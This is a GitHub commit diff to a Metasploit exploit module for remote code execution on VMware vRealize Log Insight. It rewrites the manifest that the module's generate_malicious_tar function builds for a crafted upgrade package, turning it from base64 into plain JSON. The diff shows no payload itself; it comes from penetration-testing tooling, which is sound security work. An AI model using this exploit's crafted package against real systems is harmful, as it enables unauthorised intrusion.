Update modules/exploits/linux/http/vmware_vrli_rce.rb

Co-authored-by: adfoster-r7 <[email protected]>
rapid7 · Aug 18, 2023 · 83c9c7f · 83c9c7f
1 parent 340e4c0
commit 83c9c7f
Showing 1 changed file with 62 additions and 1 deletion.
diff --git a/modules/exploits/linux/http/vmware_vrli_rce.rb b/modules/exploits/linux/http/vmware_vrli_rce.rb
@@ -104,7 +104,68 @@ def check
   end
 
   def generate_malicious_tar
-    mf_file = Base64.decode64('ewogICAgIkNIRUNLU1VNUyI6IFsKICAgICAgICB7CiAgICAgICAgICAgICJDSEVDS1NVTSI6ICI0MDc3OTFmNTgzMWM0ZjUzMjFjZGEzNmZmMmUzYjYzZGEyODE5MzU0IiwgCiAgICAgICAgICAgICJGSUxFX05BTUUiOiAiZXVsYS50eHQiCiAgICAgICAgfSwgCiAgICAgICAgewogICAgICAgICAgICAiQ0hFQ0tTVU0iOiAiOGFiMmMwYTZkMDFhMzZkMGRhYWQyMzBkYmNiMjI5ZjFiODcxNTRlNiIsIAogICAgICAgICAgICAiRklMRV9OQU1FIjogImNuX2V1bGEudHh0IgogICAgICAgIH0sIAogICAgICAgIHsKICAgICAgICAgICAgIkNIRUNLU1VNIjogIjhjYTY5YmRjMmRkZGE1MjI4ZTg5M2M0ODQzZDlmNGFmYzA3OTAyNDciLCAKICAgICAgICAgICAgIkZJTEVfTkFNRSI6ICJkZV9ldWxhLnR4dCIKICAgICAgICB9LCAKICAgICAgICB7CiAgICAgICAgICAgICJDSEVDS1NVTSI6ICI0Mjc4MDA0YTFmMmE3YTNmMmQ5MzEwOTgzNjc5ODY4ZWJlMTllMDg4IiwgCiAgICAgICAgICAgICJGSUxFX05BTUUiOiAiZXNfZXVsYS50eHQiCiAgICAgICAgfSwgCiAgICAgICAgewogICAgICAgICAgICAiQ0hFQ0tTVU0iOiAiOTUyODBmZDcwMzNiNTkwOTQ3MDNhMjljYzVkNmZmODAzYzU3MjVhZiIsIAogICAgICAgICAgICAiRklMRV9OQU1FIjogImZyX2V1bGEudHh0IgogICAgICAgIH0sIAogICAgICAgIHsKICAgICAgICAgICAgIkNIRUNLU1VNIjogImY4ZWU2N2YyNzliN2Y1NmM5NTNkYWE3MzdiYmJhYWQzZjBjYjcxOWQiLCAKICAgICAgICAgICAgIkZJTEVfTkFNRSI6ICJqYV9ldWxhLnR4dCIKICAgICAgICB9LCAKICAgICAgICB7CiAgICAgICAgICAgICJDSEVDS1NVTSI6ICJhYWExNGY3NzRmYzlmZTQ4N2FlOGZlYTU5YWRmY2E1MzI5MjhmNGEyIiwgCiAgICAgICAgICAgICJGSUxFX05BTUUiOiAia29fZXVsYS50eHQiCiAgICAgICAgfSwgCiAgICAgICAgewogICAgICAgICAgICAiQ0hFQ0tTVU0iOiAiZDcwMDNiNjUyZGQyOGQyOGFmMzEwYzY1MmUyYTE2NGFjYWYxNzU4MCIsIAogICAgICAgICAgICAiRklMRV9OQU1FIjogInR3X2V1bGEudHh0IgogICAgICAgIH0sIAogICAgICAgIHsKICAgICAgICAgICAgIkNIRUNLU1VNIjogImIwMDM0YzdmMTQ4NzZiZTNiNmE4NWJkZTAzMjJjODNiNzgwMjdkNzAiLCAKICAgICAgICAgICAgIkZJTEVfTkFNRSI6ICJ1cGdyYWRlLWRyaXZlciIKICAgICAgICB9LCAKICAgICAgICB7CiAgICAgICAgICAgICJDSEVDS1NVTSI6ICJiOTA2ZDU3MDEwMWQyOTY0Njk2NjQzNWQyYmVkODQ3OWY0NDM3MjE2IiwgCiAgICAgICAgICAgICJGSUxFX05BTUUiOiAidXBncmFkZS1pbWFnZS04LjEwLjItMjExNDUxODcucnBtIgogICAgICAgIH0KICAgIF0sIAogICAgIkZST01fVkVSU0lPTiI6ICI4LjguMC0wIiwgCiAgICAiUkVRVUlSRURfU1BBQ0UiOiAiMTA3Mzc0MTgyNCIsIAogICAgIlJQTV9JTkZPIjogewogICAgICAgICJLRVlfTElTVCI6IFtdLCAKICAgICAgICAiUkVCT09UIjogIkZhbHNlIiwgCiAgICAgICAgIlJQTV9MSVNUIjogWwogICAgICAgICAgICB7CiAgICAgICAgICAgICAgICAiQVJHVU1FTlRTIjogWwogICAgICAgICAgICAgICAgICAgICItLW5vZGVwcyIKICAgICAgICAgICAgICAgIF0sIAogICAgICAgICAgICAgICAgIkZJTEVfTkFNRSI6ICJ1cGdyYWRlLWltYWdlLTguMTAuMi0yMTE0NTE4Ny5ycG0iLCAKICAgICAgICAgICAgICAgICJPUFRJT04iOiAiSU5TVEFMTF9PUl9VUEdSQURFIgogICAgICAgICAgICB9CiAgICAgICAgXQogICAgfSwgCiAgICAiVE9fVkVSU0lPTiI6ICI4LjEwLjItMjExNDUxODciCn0=')
+    mf_file = <<~EOF
+    {
+    "CHECKSUMS": [
+        {
+            "CHECKSUM": "407791f5831c4f5321cda36ff2e3b63da2819354", 
+            "FILE_NAME": "eula.txt"
+        }, 
+        {
+            "CHECKSUM": "8ab2c0a6d01a36d0daad230dbcb229f1b87154e6", 
+            "FILE_NAME": "cn_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "8ca69bdc2ddda5228e893c4843d9f4afc0790247", 
+            "FILE_NAME": "de_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "4278004a1f2a7a3f2d9310983679868ebe19e088", 
+            "FILE_NAME": "es_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "95280fd7033b59094703a29cc5d6ff803c5725af", 
+            "FILE_NAME": "fr_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "f8ee67f279b7f56c953daa737bbbaad3f0cb719d", 
+            "FILE_NAME": "ja_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "aaa14f774fc9fe487ae8fea59adfca532928f4a2", 
+            "FILE_NAME": "ko_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "d7003b652dd28d28af310c652e2a164acaf17580", 
+            "FILE_NAME": "tw_eula.txt"
+        }, 
+        {
+            "CHECKSUM": "b0034c7f14876be3b6a85bde0322c83b78027d70", 
+            "FILE_NAME": "upgrade-driver"
+        }, 
+        {
+            "CHECKSUM": "b906d570101d29646966435d2bed8479f4437216", 
+            "FILE_NAME": "upgrade-image-8.10.2-21145187.rpm"
+        }
+    ], 
+    "FROM_VERSION": "8.8.0-0", 
+    "REQUIRED_SPACE": "1073741824", 
+    "RPM_INFO": {
+        "KEY_LIST": [], 
+        "REBOOT": "False", 
+        "RPM_LIST": [
+            {
+                "ARGUMENTS": [
+                    "--nodeps"
+                ], 
+                "FILE_NAME": "upgrade-image-8.10.2-21145187.rpm", 
+                "OPTION": "INSTALL_OR_UPGRADE"
+            }
+        ]
+    }, 
+    "TO_VERSION": "8.10.2-21145187"
+}
+EOF
     cert_file = <<~CERT
       SHA1(VMware-vRealize-Log-Insight.mf)= 9869831f4522f9aaaf2f71b54267c487a20c0d46f4dc884b56a2c77ea971aabd2839a39b22b0a864fa1825c7a637f25c85b99cfb9bf528990b7692cc5d526398fa6000809a94baaf9edcf20fab919f866014745bbf0a2cabadd76b8b6ec0ef862b803039021a4ebed2632bdecf2b77c60389e31f093ad010abeb33de1e95e59cb66a15c019b35453d71484e13f728fa74736bbe4cde37feddacef021feb0023b052ca00dd4563f4424e6387c33ffa166fb0331581a3889be4f2515512f1f15ea5d56aa43fe6a8d9b347b242edf2276eba7b055b8463f1151eab84d97d4d58bef4708080dbf0b96d4783ca8b596467a8965b91c2fddf1da549c0df34aa457f776
       -----BEGIN CERTIFICATE-----